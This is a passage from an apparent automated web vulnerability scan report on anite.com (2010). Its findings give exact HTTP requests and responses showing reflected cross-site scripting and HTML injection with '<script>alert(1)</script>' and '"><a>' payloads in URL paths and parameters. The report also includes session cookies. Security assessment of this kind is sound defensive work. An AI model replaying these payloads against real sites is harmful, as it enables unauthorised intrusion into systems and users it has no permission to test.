User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:13:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:13:35 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/898fb"><script>alert(1)</script>337bd22429a#up">
...[SNIP]...

1.147. http://anite.com/nemo-enquiry-form.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/nemo-enquiry-form.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 967b6"><a>3a0e8d61b0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nemo-enquiry-form.html?967b6"><a>3a0e8d61b0c=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:13:13 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:13:14 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/nemo-enquiry-form.html?967b6"><a>3a0e8d61b0c=1#up">
...[SNIP]...

1.148. http://anite.com/nemo-handy-320-released-with-cell-testing-improvements-and-ability-to-save-statistics-to-a-csv-file.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/nemo-handy-320-released-with-cell-testing-improvements-and-ability-to-save-statistics-to-a-csv-file.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2446d"><a>ad0fd9dddde was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nemo-handy-320-released-with-cell-testing-improvements-and-ability-to-save-statistics-to-a-csv-file.html?Itemid=4292446d"><a>ad0fd9dddde&nomore=true HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:19:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:19:35 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/nemo-handy-320-released-with-cell-testing-improvements-and-ability-to-save-statistics-to-a-csv-file.html?Itemid=4292446d"><a>ad0fd9dddde&nomore=true#up">
...[SNIP]...

1.149. http://anite.com/nemo-handy-320-released-with-cell-testing-improvements-and-ability-to-save-statistics-to-a-csv-file.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/nemo-handy-320-released-with-cell-testing-improvements-and-ability-to-save-statistics-to-a-csv-file.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbba3"><script>alert(1)</script>c406568c5b7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bbba3"><script>alert(1)</script>c406568c5b7 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:19:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:19:36 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/bbba3"><script>alert(1)</script>c406568c5b7#up">
...[SNIP]...

1.150. http://anite.com/nemo-handy-320-released-with-cell-testing-improvements-and-ability-to-save-statistics-to-a-csv-file.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/nemo-handy-320-released-with-cell-testing-improvements-and-ability-to-save-statistics-to-a-csv-file.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bde1"><a>be88d24a1d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nemo-handy-320-released-with-cell-testing-improvements-and-ability-to-save-statistics-to-a-csv-file.html?7bde1"><a>be88d24a1d1=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:19:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:19:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/nemo-handy-320-released-with-cell-testing-improvements-and-ability-to-save-statistics-to-a-csv-file.html?7bde1"><a>be88d24a1d1=1#up">
...[SNIP]...

1.151. http://anite.com/nemo-handy-w-10-released.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/nemo-handy-w-10-released.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9baca"><a>a8cc5ff6af9 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nemo-handy-w-10-released.html?Itemid=4299baca"><a>a8cc5ff6af9&nomore=true HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:19:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:19:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/nemo-handy-w-10-released.html?Itemid=4299baca"><a>a8cc5ff6af9&nomore=true#up">
...[SNIP]...

1.152. http://anite.com/nemo-handy-w-10-released.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/nemo-handy-w-10-released.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86bfc"><script>alert(1)</script>2af6f7f64fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /86bfc"><script>alert(1)</script>2af6f7f64fd HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:19:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:19:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/86bfc"><script>alert(1)</script>2af6f7f64fd#up">
...[SNIP]...

1.153. http://anite.com/nemo-handy-w-10-released.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/nemo-handy-w-10-released.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47444"><a>169f48819b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nemo-handy-w-10-released.html?47444"><a>169f48819b0=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:19:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:19:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/nemo-handy-w-10-released.html?47444"><a>169f48819b0=1#up">
...[SNIP]...

1.154. http://anite.com/nemo-indoor-network-measurement.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/nemo-indoor-network-measurement.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6fd4"><a>475caf94fe0 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nemo-indoor-network-measurement.html?Itemid=450a6fd4"><a>475caf94fe0 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:10:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:10:19 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/nemo-indoor-network-measurement.html?Itemid=450a6fd4"><a>475caf94fe0#up">
...[SNIP]...

1.155. http://anite.com/nemo-indoor-network-measurement.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/nemo-indoor-network-measurement.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a96f"><script>alert(1)</script>58f279f74e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /8a96f"><script>alert(1)</script>58f279f74e4 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:10:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:10:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/8a96f"><script>alert(1)</script>58f279f74e4#up">
...[SNIP]...

1.156. http://anite.com/nemo-indoor-network-measurement.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/nemo-indoor-network-measurement.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0317"><a>c1914408d62 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nemo-indoor-network-measurement.html?b0317"><a>c1914408d62=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:10:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:10:07 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/nemo-indoor-network-measurement.html?b0317"><a>c1914408d62=1#up">
...[SNIP]...

1.157. http://anite.com/nemo-networkmeasurement.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/nemo-networkmeasurement.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba177"><a>d1d63685fae was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nemo-networkmeasurement.html?Itemid=436ba177"><a>d1d63685fae HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:10:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:10:36 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/nemo-networkmeasurement.html?Itemid=436ba177"><a>d1d63685fae#up">
...[SNIP]...

1.158. http://anite.com/nemo-networkmeasurement.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/nemo-networkmeasurement.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27875"><script>alert(1)</script>620b5d80159 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /27875"><script>alert(1)</script>620b5d80159 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:10:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:10:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/27875"><script>alert(1)</script>620b5d80159#up">
...[SNIP]...

1.159. http://anite.com/nemo-networkmeasurement.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/nemo-networkmeasurement.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6eac"><a>cee35c03ff7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nemo-networkmeasurement.html?e6eac"><a>cee35c03ff7=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:10:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:10:32 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/nemo-networkmeasurement.html?e6eac"><a>cee35c03ff7=1#up">
...[SNIP]...

1.160. http://anite.com/nemo-outdoor-560-proudly-presents-new-lte-parameter-improvements-and-support-for-rohde-a-schwarz-tsmw-lte-scanning-receiver.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/nemo-outdoor-560-proudly-presents-new-lte-parameter-improvements-and-support-for-rohde-a-schwarz-tsmw-lte-scanning-receiver.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bd59"><a>31f92cdf09 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nemo-outdoor-560-proudly-presents-new-lte-parameter-improvements-and-support-for-rohde-a-schwarz-tsmw-lte-scanning-receiver.html?Itemid=4298bd59"><a>31f92cdf09&nomore=true HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:19:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:19:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
